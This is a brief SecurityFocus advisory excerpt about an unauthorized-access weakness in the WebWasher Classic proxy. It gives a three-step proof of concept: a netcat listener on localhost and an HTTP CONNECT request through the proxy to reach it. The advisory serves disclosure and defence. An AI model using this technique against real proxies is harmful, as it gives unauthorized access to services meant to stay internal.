WebWasher Classic HTTP CONNECT Unauthorized Access Weakness

An exploit is not required.

The following proof of concept is available:
1) Start a netcat listener on the WebWasher system:
netcat -L -p 99 -s 127.0.0.1 < hallo.txt
2) Connect to the WebWasher proxy port (default 8080/tcp)
3) Enter command "CONNECT 127.0.0.1:99 HTTP/1.0"

As a result, content of hallo.txt will appear.


 

Privacy Statement
Copyright 2010, SecurityFocus